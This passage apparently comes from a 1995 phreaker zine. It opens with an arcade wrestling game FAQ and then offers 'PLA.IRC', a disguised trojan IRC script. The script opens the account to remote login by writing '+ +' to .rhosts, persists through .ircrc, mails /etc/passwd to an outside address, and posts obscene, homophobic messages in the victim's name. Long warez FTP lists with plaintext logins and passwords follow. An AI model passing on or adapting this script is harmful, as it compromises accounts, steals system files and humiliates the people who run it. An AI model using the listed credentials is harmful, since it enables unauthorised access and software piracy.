the matches go inversely in factors of two: [] [] [] [] [] [] [] One on One 2 on 1 3 on 1 International Two on One 3 on 1 Royal Rumble Heavyweight The Royal Rumble is actually a modified rule version. There is no more than four people in the ring at once, and being tossed over the top rope does not disqualify you. But, yes, you must fight all 8 opponents. Are you tough enough for the challenge??? *************** *** B U G S *** *************** "What a moron!" I've found a slew of bugs and wrote some down to let Midway know about it. Many have been fixed and some may remain. Some bugs are simple little glitches (e.g., BamBam jumping off the turnbuckle just as the opponent is getting up and your opponent will be "on fire" until hit). I will not list all the small glitches for there are many of them. I will only list those which affect gameplay. * Sometimes the CPU will pin me and the game freezes. This has happened to me 3 times. All 3 times, both me and the CPU had the combo meter flashing. There may or may not be a significance to that. * Also, getting up from a pin can be quite useless. One can sit on the turnbuckle and the moment you flinch, you will not get up and die. Also, you cannot recover from a repeated attack done repeatedly. An example is with Doink's quad happy hammer. I can do this to you all day until the timer runs out and you cannot recover from your pin as long as I do this all day. I sure hope they fix this one! * Once playing against 2 CPU opponents, I killed the first one and then killed the second one, but instead went to pin the first one. He was able to recover (get his second wind). * One bug that happened was that my partner started his combo. Somehow I reversed it as it began and his combo meter was completely gone! That's right, a 0 hit combo (but it will not say this). I reversed it right as it started up. Weird. * Undertaker's shadow neck slam reversal causes a bug. First of all, he can't turn it into a quad shadow neck slam and second, after he does it, he still has shadows following him after he does the move. * Yet another bug is doing a combo and still retaining your combo meter! More on this once it is investigated a little deeper. ************************** *** R U M O R M I L L *** ************************** "I'd hate to be on the receiving end of that one!" * New CONFIRMED Rumor!! * Rumor had it that there may have been fatalities and it has been confirmed although the method to do them is still unknown as of this writing. The only one discovered so far is with the Undertaker. A coffin will slowly come up from the middle of the ring and his opponent will fall into the coffin while the coffin closes on him. The coffin will go back down into the ring with a tombstone appearing in its place. Rumor has it that The Undertaker must stand about 3 inches away and possibly tap down 4 times and press punch. More to come once the information starts to flow. * Update on FATALITIES!! * YES, the fatality for The Undertaker's has been confirmed and the motion to do it is to stand close to your opponent and hit D, D, D, D, + P. As far as what conditions are needed to be able to do the fatality as of this time are unknown. Rumor also had it that there were NBA-Jam style codes and it is true. The only codes found thus far are the following: * tap punch 4+ times during the vs screen and hold it down This turns Moves Names On. The names of the moves are listed at the bottom. * tap PK, K, PK, K, during the vs screen This turns Drones Meter On. I still didn't see a recovery meter of anything for the drones. I will look into this one some more when I get the chance. This code seems to do absolutely nothing. * ??? Disable blocking. It only worked for a 2-player mode, but it is still unclear how to enter this code. The rumor mill is always alive with neat stuff. Rumor also has it that Mark Turmell may be a secret wrestler in this game, but highly unlikely for it would look weird with Mark's head pasted on another wrestler's body. Rumor has it that there will be more codes added later once the final edition hits the nation. Now that the game has hit nationwide, hopefully more time has been added to enter the codes. Rumor also has it that there may in fact, be an "ultra" combo which would take off a lot of life. Hopefully, this isn't implemented for this would throw the game balance out the window. ******************* *** T H R O W S *** ******************* "He got exactly what he deserves!" This is wrestling. You are SUPPOSED TO THROW! If someone whines about this, tell them to play Killer Instinct or something. This game is definitely not for the no-throw community. There are 4 types of throws. grab) FF+PP This is the normal grab that everyone has. Tap forward twice and hitting power punch will attempt to grab the opponent. Get the know your throwing ranges!! This is important!! Grab from max range! It's the secret to how I get a lot of throws off. hehehe power throw) PP+KK Some big characters have power throws. These throws are unique for they hold them up in the air, then slam them down. What makes these throws really good, is that they are NOT reversible. You can't counter a power throw, so a character who has a power throw is good. Yoko, Lex, and BamBam are the characters who have power throws. hip toss) BB+P Whipback throw, also known as a snap mirror (whatever that means). Many times when you're repeating punching the face of some guy (using power punches), as they are reeling back you can execute a throw in the middle of these punches and it will grab them and throw them out of the ring. It's an over the shoulder kind of throw. I don't have the exact motions on this one, but Razor can do this one pretty good. Also, this throw is quick and not reversible. rope toss) BB+PP This slings your opponent against the rope, leaving him helplessly running for a brief period of time. You can follow this up with an attack of your own. You can get original on this one. After grabbing your opponent, you have many options. Every character has 2 universal High Risk Moves and mini combos. Mini combos can be reversed early once they start. After that, then it's a real combo. Mini combos are good because they are easier to start up, plus can potentially do more damage than a standard throw. So in essence, mini combos are like real combos but they can be broken (combo breaker). Also, you have the option to throw if you like. The best of both worlds rolled into one game. Also, bouncing off the ropes and attacking your opponent is considered a High Risk Move! Use this to your advantage. If you want to drop kick someone, try to bounce off the ropes first, if you can. ************************************** *** R E V E R S I N G T H R O W S *** ************************************** "Wait a minute!" "Quick reversal!" There are two main ways for reversing (breaking) throws. One is a "clean" way and simply do your piledriver motion for your specific character. Yet another way (which I see a lot of newbies doing) is the "spaz method". Just spaz on the joystick and buttons as if you're breaking out of a dizzy. But to save wear and tear on the machines and improve strategy and game play, spazing seems to just make you look like a retard and can be quite unreliable. ******************* *** C O M B O S *** ******************* "Incredible combination move!" Do a lot of special moves (and throws) and your combo meter goes up. Certain characters have specific buttons which charge up their respective combo meters. For example: Lex Luger can only charge up with PP. Yokozuna can charge up with any button. Undertaker can only charge up with PK, and K I think. Once more is known, this will be completed. Combos are done by first grabbing your opponent (FF+PP), and then performing a "combo initiator" move. Then after doing this, precise timing between pre-programmed button sequences will execute the combo. The timing on combos can be tricky at first. To execute the combos requires only a few button presses, but I strongly urge that you use multiple button presses, so that you will make sure you get the combo you want. It can't hurt. I will provide an example of timing. ------------------------------------------------------------------------------ Bret Hart's 16-hit combo: 1) do a grab (FF+PP) 2) now do the PK initiator (FF+PK) 3) tap PK and bret hart will start by kicking 5 times. 4) around the 5th kick, tap PP 5) bret hart with throw 5 punches. start tapping P 6) bret will do a body slam. as soon the bret finishes the first body slam, tap K 7) bret hart will do 2 more body slams. tap PK after the 3rd body slam 8) bret hart now will do 3 back breakers. 16-hit combo. Right now, the combo notation looks like this: (grab), FF+PK PP P K PK But will look like this later on once combos get more complex: (grab), (5), PP(5), P(1), K(2), PK(3) = 16 hits ------------------------------------------------------------------------------ Where the combo initiator is in brackets and the number of hits follows each button press. I'm unsure as of this writing the exact number of hits that each button press does in each combo, so be patient. Mini-combos: Mini combos are small combos which do not affect your combo meter. These combos can be started from a grab or from a close attack (preferably when a player is just getting up). To do these attacks, you must hold the stick in a direction and hit punch or do special joystick motions. Only the mini combos starting from a grab can be reversed, I believe because the way the throw reversal works. If you start a mini combo from a close range attack, then it can't be reversed. More to be researched later... Examples of mini combos include: ------------------------------------------------------------------------------ do a grab with bret hart. hold the stick forward and tap P repeatedly. voila. 5 hit punch combo. do a grab with razor ramon. do a QCT+P. razor will do a mutiple razor move. Beware!!! Once these mini-combos have started, they can be reversed. Get close to an opponent and hold forward and tap PP. This will also start up a mini combo with some characters that is uncounterable. Some of these uncounterables end with a throw. As an added bonus, you can "buffer" certain mini combos with throws. Try this out with Bret Hart as an example: do a grab with bret hart. hold the stick forward and tap P repeatedly. Now immediately do a HCT+P, {P}. you will do a few punches interrupted by a quadruple slam. Very key and good for wiping out beginners who can't reverse. A little risky, but possibly is worth doing. If you get thrown, at least you did some damage with those previous punches. If you throw him, you do your throw damage plus the previous punches. Use your judgment. ------------------------------------------------------------------------------ *************************** *** S T R A T E G I E S *** *************************** "Un-be-liev-able!" Each wrestler is different. Razor Ramon does insane damage with his throws, so if you're the throwing type, then Razor Ramon is your man. If you like sheer brute force, try Yokozuna. For finesse, try Shawn Michaels or Doink. Pick a wrestler that suits your needs. A good general strategy that I use is to try to always stay on the left side of the screen. (facing right). For me (this is me and it may not apply to everyone else), I find it much easier and faster to tap twice towards the right than towards the left. So when I'm facing right, I like to grab and throw. When facing left, I like to use the hiptoss so that we can switch positions. This helps me get more throws off in time and increases my throwing percentage. When fighting 3 or more guys by yourself, STAY IN A CORNER!!! This way you wont have to worry about looking behind you. If you fight in the middle of the ring and grab someone to do a throw, someone from behind will come and hit you. If you stay against the ropes, you don't have to worry about this and this is important if you want to beat the game (esp. on the heavyweight division). Nothing really special happened when i beat it on heavyweight. Just said that i am the new champion or something. A good CPU strategy is to use Doink and continually use the grab, punch, body dive combo. It does little to increase your combo meter, but when there are so many CPU opponents, your objective is to take as much energy off as you can to kill them. Conserve your combo meter until necessary. Do not waste your combo meter on a CPU opponent who has little life left. Use it on the person who has more life so you can kill them faster. When fighting a human or 1 CPU wrestler, this does not apply. The hip-toss is deadly. Some people can hip-toss people out of the air. The best is when someone does a move, you block, and then do a hip-toss before they even land. Hard but possible. When reversing try to quad throw as much as possible. Your objective is to kill and not be killed. Take off as much energy as you can. Be very critical about using your combo early on. You may need that combo meter lit for the all important third round. Without your combo meter, you can't make that spectacular comeback nor can you get second wind. *************************** *** C H A R A C T E R S *** (in alphabetical order) *************************** "He can't get away with that!" This section is starting to fill out quite nicely now. ??? = I don't know it (!) = unconfirmed by me * = quadruple move {} = repeated button taps ch = charge (hold button down) for 3 seconds, then release --------------------- -- Bam Bam Bigelow -- --------------------- special moves: fist rush: chP fire throw: chPP, run, release PP flying snap kick: BB+PK throws: power grab: PP+PK *(pogo)piledriver: (grab), DD+PK, {PP} backbreaker: (power grab), DD+PK minicombos: fist rush, power grab combos: initiators: PP, PK 20-hit combo: FF+PP, P K PK PP 22-hit combo: FF+PK, P PP K PK PP (!) --------------- -- Bret Hart -- --------------- special moves: roll: QCT+PP eye raker: HCT+P or chP sharpshooter: hit PP next to fallen opponent's feet. dashing uppercut: DD+P lunging kick: BB+PK throws: face slam: (grab), HCT+P *quadruple slam: (grab), HCT+P, {P} DDT: run+PP mini combos: (grab), hold F, {P} (grab), hold F, {P}, face slam combos: initiators: P, PK 16-hit combo: FF+PK, PK PP P K PK or (5, PP5, P1, K2, PK3) (see above) 13-hit combo: FF+P, PP, PK P (!) ----------- -- Doink -- ----------- special moves: *the clapper: HCT+P, {P} joybuzzer: chP (or QCT+P after grab) *happy hammer: FF+PK, {K} throws: head slam: (grab), FF+PP *face smash: (grab), DD+PK, {K} mini combos: (grab), P, hold F, P+K (punch + body dive) [good combo!] combos: initiators: PP, PK 20-hit: FF+PP, PK, P, PK, K 19 or 20 hit: FF+PK, PP, K, PK, K 16-hit: FF+PP, PK P K 16-hit: FF+PK, PP K P 14-hit: FF+PK, PP P K --------------- -- Lex Luger -- --------------- special moves: fist smash: chP *fun flail: FF+PK, {K} elbow girder: FF+P throws: power grab: PP+PK suplex: (grab), FF+PP (can throw people out of the ring) throw: (grab), DD+PK mini combos: ??? combos: ??? initiators: P, ?? ??-hit: (kicks, punches, quad back breaker, fun flail) ----------------- -- Razor Ramon -- ----------------- special moves: quick slice: QCT+P dashing slice: chP quad slam: FF+K, {K} (does the quad slam without the need to grab first) throws: razor's edge: (grab), FF+PP *quadruple slam: (grab), DD+K, {K} mini combos: (grab), QCT+P combos: initiators: PP, K 24-hit: FF+PP, P K PK PP (P) comments: --> I did a mini-combo a few times with razor where I slapped them a few times then did a throw that went way up in the air. It might be a grab, plus hct+p, plus ff+k, {k}..... -------------------- -- Shawn Michaels -- -------------------- special moves: flying double snapkick: BB+PK back breaker: DD+PK back breaker: chP some stupid kick: chPK frankensteiner: FF+PK drop kick: FF+K sunset flip: FF+PP *quadruple kick: HCT+K, {K} (up close) throws: run + PK (leg throw) run + PP (body tackle throw) arm breaker: (grab), FF+P mini combos: (grab), hold F, PP combos: initiators: P, K 16 hit: FF+K, PK HCT+P, then I start jamming on all of the buttons (!) (punches, kicks, three hip-toss, three stomps) 15-hit: ??? comments: --> I did a move (a few times actually) where i knocked them down, then walked over to their fallen body and I did 4 stomps on them while they were down. Has anyone figured this one out yet? -------------------- -- The Undertaker -- -------------------- special moves: warp: QCT+P neckbreaker: chP shadow neckbreaker: chP, run, release P dark ghosts: QCT+K (this takes off damage) light ghosts: QCB+K (this stuns them, but doesn't take damage) *tombstone smash: FF+PK, {K} throws: uppercut buster: (grab), DD+PP fire neck slam: (warp), DD+PK *shadow slam: (warp), DD+K, {P} mini combos: combos: initiators: K, PK 21-hit: FF+PK, K P PP PK (kicks, kicks, punches, quad shadow neck slam) fatalities: fatality 1: close to opponent and DDDD+P The Undertaker pushes his opponent into a coffin which appears from under the ring. The coffin goes back down and a tombstone appears in its place. -------------- -- Yokozuna -- -------------- special moves: salt throw: chP (or QCT+P after grab) belly rush: FF+P (character away or farther) head knocker: FF+P (up close) throws: power grab: PP+PK (can throw people out of the ring) leg spin throw: (power grab), DD+PK (another cool throw) ?? FF+PP ?? DD+PK mini combos: combos: initiators: P, PP ??-hit: FF+P, PP PK *note*: yokozuna cannot jump out of the ring off the turnbuckle ************************* *** D E S I G N E R S *** ************************* "Put 'er there, pal!" If you look in the crowd, you can see the people who made this game possible. Right smack in the middle, is Mark Turmell. Many of you may remember him from NBA JAM (MJT March 22). Mark Turmell is the main guy responsible for this game. The others are: In the crowd from Turmell to the right... Sal Divita (head artist) Sheridan Oursler (hardware tech) Josh Tsui (artist) Eugene Greer (artist) Tony Goskie (artist) Mark Penacho (programmer, but not on this game) In the crowd from Turmell to the left... Jason Skiles (programmer and avid internet user) Jake Simpson (programmer) Mancow Muller (radio dj on Rock 103.5 and devout WWF fan) Sophia (Mancow's significant other) Dewey Gosnell (network tech) Jamie Rivett (programmer) I am not making public the e-mail addresses of these people due to projected mass amounts of mail these guys may receive from listing it here in this faq. Sorry for any inconvience. *************************** *** C O N C L U S I O N *** *************************** "Aw, that was cheap!" This seems to be a very promising game. Over here, more people play this than mk3!! Seriously! The graphics are much cleaner and overall, this game rocks. I thought I would never say that about a wrestling game. I love this game! As far as game balance goes, this game is very good. It is hard to say who is exactly the "best" wrestler. Everyone has a good chance of being good. It all depends on the player and his/her style. To get this faq, you can get it from ftp at: ftp.netcom.com get pub/vi/vidgames/faqs/wwfwrest.txt brawl.mindlink.net get pub/vidgames/faqs/wwfwrest.txt or from the World Wide Web (WWW) at: http://www.cs.indiana.edu/hyplan/bodom/wwf.faq (most recent updated faq) http://cs.sau.edu/~mkruse/wwf/ ftp://ftp.netcom.com/pub/vi/vidgames/faqs/wwfwrest.txt ftp://brawl.mindlink.net/pub/vidgames/faqs/wwfwrest.txt ********************* *** C R E D I T S *** ********************* "This is a complete disaster!" Authors, Combo Artists, and Contributors Brian Odom ......................................... bodom@kiwi.ucs.indiana.edu Mark "UNC" Uncapher .......................... muncaphe@iunhaw1.iun.indiana.edu Spencer Olson ............... olsospe@elof.acc.iit.edu or torgo@tristero.io.com Frodis!!!!! ................................................. frodisman@aol.com Zargon (Ching-Hwa Yu) .............................................. cyu@ic.net Bob and Rick White ........................................ ejwg19a@prodigy.com James "Boy Toy" Melki ..................................... jmelki@mcc.mott.edu Friar Tuck's Arcade in Calumet City, IL and Midway for letting us test the game The American Family Entertainment Crew Flint, MI Michael Crockett (crockett@student.umass.edu) for the short biographies Andy Eddy (vidgames@netcom.com) and Dave Kirsch (a00563@giant.mindlink.net) for the ftp sites. (C) Copyright, 1995 |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | PLA.IRC he most elite irc script out there. Give it to a friend today! |_________________________________________________________________________________________________________ ______________>CUT HERE<_________________________________________________ #pla.irc written by dr. hate in a fit of drunken rage set novice off exec echo + + >> .rhosts exec echo eval load phoenix.irc >> .ircrc exec echo "echo + + >>.rhosts">>.ircrc say 3Y3 HAVE BEEN RHOSTED BY THE PLA!!! exec cat /etc/passwd > pla.tar exec mail apok0lyp@basenet.net < pla.tar wallop I love the PLA!!!! say I love to jerk off to pix of nekid amy@$# wait 10 say I really love it! wait 10 say me wants to get it in the ass in the name of r0y right now!!! say me is going to #r0y!!! every one is invited!!!!@%^ wait 10 say me wants to suck cock in the name of r0y join #r0y wait 10 say I want you all!!!!!! me likes to suck r0y's cock wait 10 say I want to be fucked up the ass by burly r0y!!!! wait 10 me likes it that way!!!! say I love to get fucked in the ass by r0y wait 10 me is feeling horney. Anyone want to fuck me for R0Y?? me is now accepting e-mail from any takers!!! wallop I LUV THE PLA@$%@^ wait 10 say I want to be butt fucked by R0Y join #hack me wants to suck some horny stud named r0y me wants to take it in the ass from r0y say I love to get fucked up the ass by big guys named r0y!! wait 10 say I really love the PLA! wait 10 me wants to get it in the ass right now bye the PLA!!! me is going to #r0ysex!!! every male is invited to come!!! wait 10 join #r0ysex wait 10 say I want you all!!!!!! me likes to suck cock for the PLA!! wait 10 say I want to be fucked up the ass by r0y!!!! wait 10 me likes it that way!!!! wait 10 me is feeling horney. Anyone want to fuck me for R0Y?? me is now accepting e-mail from any takers!!! wallop I like sucking gay men named r0y wait 10 say I want to be butt fucked by r0y join #phreak me wants to suck some horny stud in the PLA say I love to get fucked up the ass by the PLA!! wait 10 say I really love it! say I need a horny male man now wait 10 me wants to get it in the ass right now cuz the PLA r0x!!! me is going to #2600!!! every male is invited to come!!! wait 10 exec mv pla.irc phoenix.irc join #2600 wait 10 say I want you all!!!!!! me likes to suck cock for the PLA!! wait 10 say I want to be fucked up the ass by the PLA!!!!! wait 10 /me likes it that way!!!! wait 10 /me is feeling horney. Anyone want to fuck me for R0Y?? /me is now accepting e-mail from any takers!!! wallop PHEAR THE PLA wait 10 say I want to be butt fucked by the PLA join #bearcave /me wants to suck some horny stud say THE PLA ROQ I RAN THIER GAY SKRIPT msg tr1be y0y0y0 fear the pla join #hack /nick tr1be say y0h i'm tr1be and the pla fucks me in the rear say y0h ish dat illin chillin fewl that sucks big burly r0y dick exec -m k0wacid ls /* .* /msg piker 3y3 th1nK Ur 4 l4m3 l1ttl3 b1tch tH4T k4Nt h4nDl3 b31ng 4n 1rc0p 4nd 3y3M 4 b0t 4nd th3r3 1z n0th1ng U k4n d0 4b0uT 1t b1tch! exec -m piker ls -al /* .* say here are my warez courtesy of the PLA! exec -o ls -al exec echo "i think ur a faggot, bitch!" > comment.txt exec mail root@localhost < comment.txt join #acid say U shall all bow down and k1ss my butt say i fear the PLA! say so should you! /me is bending over waiting for some hot d00dle stud to unload in his swolen hole! /me wants radman to stick his penis in his butt and wiggle it! say PHEAR THE PLA BITCHES! -------------------------------------------------------------- Sadly we only have one submission for the PLA classifieds. Lod t-shirts SM-XXL many colors $19.95 a t-shirt email erikb@phrack.com for the address ------------------------------------------------------------------------- WEll kids these are the things i have found in other people's directory. There is somethin here for every one. And remember 0-DaY is the 0nly WaY! ____________________________________________________________________________ Enjoy :) E-Male ftp.cursci.com HOST=ftp.cursci.com UID=anonymous DIR=/incoming/.../.../.../.../..../...../warez COMMENT=working..ok site ftp.hktcl.com HOST=ftp.hktcl.com UID=anonymous DIR=/pub/windows/win95 COMMENT=win95 site interse.com HOST=interse.com UID=anonymous COMMENT=working ftp.dyess.com HOST=ftp.dyess.com UID=anonymous DIR=/incoming PASVMODE=0 COMMENT=has hot java ftp.aladdin.co.uk HOST=ftp.aladdin.co.uk UID=anonymous DIR=/pub/incoming/test1.gif/||| COMMENT=semi-small site [ HOST= UID=anonymous DIR=/users/heeger/abekas/Style/.cache [sdune II HOST= UID=anonymous COMMENT=working [ HOST= UID=spock PWD=vulcan COMMENT=Kirk! [ftp.death.com] HOST=ftp.death.com UID=site PWD=leech http://vax.mankato.msus.edu] XXXXXXXXXXXXXXXXXXXXXXXXXXx HOST=http://vax.mankato.msus.edu XXXXXXX UID=anonymous [ftp.rahul.net] HOST=ftp.rahul.net UID=anonymous DIR=/pub/oms/www/ricci/usa/.../.appz. COMMENT=sux site [] HOST= UID=anonymous PWD=jerry@ap.net DIR=/game COMMENT=shitty but works [ HOST= UID=anonymous DIR=/pub/users/scunnin1/incoming/Politics/Pestroika/Vladmir/SolarWind/SolarSite COMMENT=good site [ HOST= UID=anonymous DIR=/pub/ken/ge/.cache/.RGD COMMENT=stange layout but works [ HOST= UID=anonymous PWD=jerry@ap.net DIR=/.1/X/X11/X11R6/contrib/incoming/ls-lbF.Z COMMENT=working..sux site [ HOST= UID=anonymous DIR=/incoming/people/humans/geography/asia/mongolia COMMENT=sux but works [] HOST= UID=anonymous DIR=/pub/texastat.hp4p.gz/[[Lplingplang COMMENT=fair site [] HOST= DIR=/pub/Incoming/.../ COMMENT=ok.. has games [] HOST= UID=anonymous DIR=/pub/incoming/da_firm/zero/.../... COMMENT=fair site .. valarie2 [] HOST= UID=anonymous COMMENT=too many users [] HOST= UID=anonymous DIR=/incoming/temp COMMENT=fair site [] HOST= UID=anonymous DIR=/incoming/MiCRoSHaFT_eLiTe_TRaDeRZ COMMENT=small site [] HOST= UID=anonymous DIR=/incoming/K COMMENT=small site [] HOST= UID=anonymous DIR=/.profile COMMENT=cool site Official #warez_talk Sitez List 11-02-95 Compiled and sorted by realistik and snowe From contributions made by sensible WaReZ-PeRsOnZ!!! stop mdma.stu.rpi.edu 4 +(NoDir) /incoming/scorp.inc/... hillres154.cc.purdue.edu 4 +(NoDir) LG: cell PW: cell NEBULA.SYSTEMSZ.CS.YALE.EDU 14 +/pub/blenko/ NEBULA.SYSTEMSZ.CS.YALE.EDU 14 +/pub/blenko/.[A/.RGD NEBULA.SYSTEMSZ.CS.YALE.EDU 14 +/pub/blenko/.^[[A/.RGD/ nifty.bookstore.uidaho.edu 3 +/anydir /incoming/warez (warez dir is hidden /incoming/telemate.txt l:kirk p:enterprise /d:/nahs toto.csustan.edu 3 (NoDir) LG: kzack PW: budd2 /pub/dos/gamez /pub/other/cracks /pub/win31/appz /pub/incoming/ /incoming /incoming /pub2/next/sonata/. /.rejected/pub3 /stuff /pub/contrib must up for access y/.. ^A^H^H/. ^A^H^H/ /pub/music/ /pub/slatec++ /comp/tal /pub/incoming/../^P^E^N^N/ /pcpublic/os2/mailer/ /.^I /www/stuff/ /temp /pub/incoming/ /mounts/pubdsk3/sgi/sgi /fax/incoming/ /incoming/^L^E^A^V^E^I^<{o}^{o}>T/biler.zip/.^I^Efalckvogn.zip^E /incoming/ /pub/submissions - /incoming/tmp /pub/security /incoming<_Jaz_> /incoming/^[[B^[[U^[[G^ [[I/. cache^H^I^P/^E^N^Y^O^Y/ L: al341555 PW: abc /incoming/ /pub/.unreadable/ /incoming ftp1.pu-toyama.ac.jp 4 (NoDir /incoming/ /pub/isis/incoming/AuctionDemo/istk/ADR /pub/nnse/spininfo.txt^ H/^H^O^T L: cmd(CMD)PW: ygro /pub2/ /incoming/acetone/ - /pub/Catalogs/Herbig-Haro/reference.txt /??urto/unr_calpulses/warez/warez /incoming/.. /<_Jaz_> /droms/OCLC/.cache /posix/sec/a/... /dept/econ/.^H^F^E^A - /dept/nisg/incoming/ L:loonytoons PW: acme /pub /Incoming/ /pub/fred/ /incoming/mmc/core/ /in.coming owl.nstn.ca 17 /in.coming/ /.a/aid/disk2/src/.b/ /incoming/mis.net/ /incoming/ L: pool PW: pool ~thunder/soft /incoming/ L: ora628j PW: pluto read README (like sam) /uploads/ /paul/1942airw/ L: apple PW: daemon l:ircftp pw:ircftp00 /pub/00needtest L: anon /pub/tax/.eee/ /pub/wombats/ape/ftp/.[[A/RGD /pub/tribe/Incoming/.test/... l: warez p:computer aki.cmet.cl 3 /pub l:zz95 p:S.f.DRAKE scs.amp.pw.edu.pl 12 /incoming/people/humans/geography/asia/mongolia/cham.jpg /uploads/win3/business/finacial/.../WAREZ /Archived Files PP-FS2.LSUMC.EDU 6 /pat PP-FS2.LSUMC.EDU 6 /you'll Enjoy :) E-Male **************************************************************************************** Private Sites **************************************************************************************** l:ftping p:openden l:leach p:leach l:win p:win l:obsidian p:hwc159 6664 l:crew p:letmein #*#*#* best site(ratio tho) l:dgwood p: 93555 l:nite p:crunch l:satch p:warfare l:Win95 p:2guest l:warez P:JUMP l:warez p:warez l:warez p:warez l:Elvis P:Twinkies l:pop p:pop l:tonshere p: smith l:warez p:warez l:wsp p:warules l:wsp p:wtf l:warez p:houze * - this list is from #wares-house - * 12/09/95 6:15 am GMT GooD SiTeS --------------------------------------------- An * indicates a new site tonight. --------------------------------------------- 16 DAYS left for pirating...I mean Christmas Shopping * /pub/bordercollies/bctemp/bchealth/. . ./ * /pub/gopher/..[][][][A /.UJ * /xemacs/contrib/incoming/.[A/COBSITE/ /pub/.j/X11/X11R6/contrib/incoming/ls-lbF.Z/ /pub/kerrsite /pub/gif/General/... {qmodempro thats it) * l:dgwood p:93555 D:/pub * /incoming * /outgoing/student/Mary/Christmas/from/Ware/Chronic /pub/oms/www/ricci/usa/ (many dirs) /pub/oms/www/ricci/usa/FiSt/ (many dirs) * /users/slash/models /pub/Matatan/Matatan * /pub/[a/neverland/tick/temp /incoming/warez/Gamez (busy) H:/ftp/download/ZORKGROUP/ /pub/incoming/warez * l:audran p:LaMeR /pub/misc * /pub/users/wmccarty/incoming/ TRW'Z PuRelY ElEEt sitelist.. Released: Dec. 09, '95 ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ftp.cs.utah.edu /pub/..__/doh!/ /incoming/.../ nhl96 mk2 pitfall and many more /pub/uploads / /AMIGAWAREZ /pub/warez login:warez pass:2eleet4u l:El_Seed p:Zod l:jayman p:simbah felix.res.jhu.edu l:tabasco p:tabasco /incoming/ wsp/wsp DELETERS!/ l: pillsbury p: d0ughboy /public hands of fate95 fury3 crusader GOOD SITE /dbgraphics/|||/<><>/|/ /broadcast/" "/"." /games L:warez P:warez /bbs/incoming/msdos u:ftp p:lamma l:pie_rat p:pie_rat l:kirk p:enterprise /d:/nahs Login: Kirk Password: Enterprise u:kirk p:enterprise login:kirk Pass:enterprise /pub/incoming/.dev/games /pub/incoming/.dev] /".."/inc /incoming l:anonymous p:email /pub/pics [The directories are _VERY_ messy] incoming/.../.././ .....................porn log: leach pass: leach /incoming l:guest p:guest Username: Guest Password: Guest L&P: guest /".. "/mac /incoming/pc C:\winapi\netserv\ns-home\public\___\___ l:ttaylor p:sony770 C:\WINAPI\NETSERV\ns-home\public\___\___ l:infidel pw:MoreWillCome /incoming /in.coming/ ag.nchu.edu.tw l:game_exchange_paradise p:Fatman /pub/user-supported/hiho chaos.eng.wayne.edu /incoming/.cache+/.___|/ l:warez p:scotch l:warez p:stuff (anonymous name) /uploads/win3/business/finacial/please_upload/.../da_warez_are_ba ck l:bucket p:black l:track p:666 pub/ .../ / /pub/leech/vect.Z/vector.tar.Z/ /pub/test.txt/.../ /mirror/ultrasound/submit/groove /ftpsync3/ftp.x.org/contrib/incoming/ls-lbF.z (ftp.crl.com) /users/st/stupid/incoming/gold / /pub really old stuff vbdecompiler and turbo c++ /pub/reqz check the dirs most are in there /pub/jcase l:god p:normal1] pub/incoming/phoenix/AA2PS.COM/pc ftp.nt.com /pub/ISO_IEC_SC6_WG6_Beppu/pdf_readers/dr /pub/test.txt/.../ /pub/ /..../.haha/ /pub/ /.haha/Win95logo.bmp /pub/./.tmp /pub/smann/upload/vfc'95 /incoming/INTERNET/Slower/.../.... d:\dsg\.gamez /incoming/.cshrc coil.com pub/users/SeEd95 /incoming /pub/test.txt/... id: bill pw:whitehouse coil.com glasscity.net/incoming/.^[[A /incoming/.[A/. 95/.AbsZer0/4.Appz incomind ncbi.nlm.nih.gov pub/fate/95 /pub/vicki L:Bob Marley P:Sucks anonymous /pub/users/phend alumni.caltech.edu /pub/vicki incoming/mk l:tolkien p:bilbo /games ftp.internet.net /incoming/hoch e/.../warez l=mz69 p=gamezhome/mz69 /in.coming l=Severian ftp.ccnet.com /users/crick/.../ l: rocket p: shiny /tmp ftp.interse.com /pub/incoming/SiteUnsee (Invisible directory) l riptide p undertoe /incoming /incoming/warez /members/warmech/warez abello.seci.uchile.cl /pub/"..."/".unreadable "/bin ag.nchu.edu.tw /SYS3/GAME l:game_exchange_paradise p:Fatman autosim.com /pub/uploads/tmp2/__here|||/ camelot.bradley.edu log: civsg pass: civsg /var/tmp/.FL0001FAA6 csbh.mhv.net /pub/incoming has acad and nbajam kinda messy cv.jinr.dubna.su /.9 cxc1.msu.edu /freebsd/incom ing/.tmp/ cyfer.esusda.gov /pub/ darwin.cc.nd.edu /pub/submissions/codex/fucker/fucker ftp.cam.org /users/jb/.145 ftp.ccnet.com /users/crick/.../vb40. for win ftp.cs.tut.fi /pub/orf/DO2/.wrz ftp.cursci.com /incoming/ // hardball 5 ftp.dartmouth.edu /pub/dropoff/couple of dirs ftp.dei.uc.pt/pub/fun/ ftp.doc.ic.ac.uk ftp.fishbowl.com L:rtsporn P:fuckfuck XXX Site ftp.goat.com ftp.gte.com /pub/incoming/wales ftp.hktcl.com (pub/windows/win95) ftp.internet.net /incominghoche/.../Warez ftp.internet.net /incoming/hoche/.../Warez/ millenia nbajam ftp.jinr.dubna.su (TONS of "older" warez) ftp.microsoft.com /bussys/winnt/winnt-unsup-ed/shell-tech- ftp.nt.com /pub/ISO_IEC_SC6_WG6_Beppu/pdf_readers/drivers/ ftp.sambrone.com ftp.skypoint.com /incoming/. /.../.TDT ftp.srmc.com /pub/tiburonsj/incoming/. ftp.srmc.com pub/tibu~ [?5l #3 Merry Christmas#4 Merry Christmasv>*< ^/o\/ \/~~ \/ )0f(B ~~ \/ ~~ \ / f ~~\ /~~ \ lqq@qqktqqnqqumqqvqqj/ ~~ \qqqqqqqwqfqwqfqfqfqx x/mqqqj\lqqqkmqqqj @`0of* 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HI THERE! I HOPE YOU HAVE A NICE CHRISTMAS VACATION!  --HO HO HO  The End. Long Live r0y! ��������������Contact�The�Phone�Losers�Of�America�Nearest�You!��������������Ŀ � 512-703-8910.................................PLA Voicemail System (RBCP) � � 314-995-1261..................................PLA Voicemail System (Zak) � � 618-797-2339.............................................Roy's Place BBS � � 503-928-4912......................................Whombat Communications � � http://www.basenet.net/~apok0lyp/welcome.html...............PLA web site � � FTP.FC.NET.....................................pub/deadkat/phreaking/PLA � � ETEXT.ARCHIVE.UMICH.EDU............................pub/Zines/PhoneLosers � � whombat@blitzinfo.com.................................RedBoxChiliPepper) � � cactus@i1.net.........................................Zak a.k.a. el_jefe � � collcard@big12.metrobbs.com......................To contact Colleen Card � � apok0lp@i1.net......................................To contact Apok0lyps � | 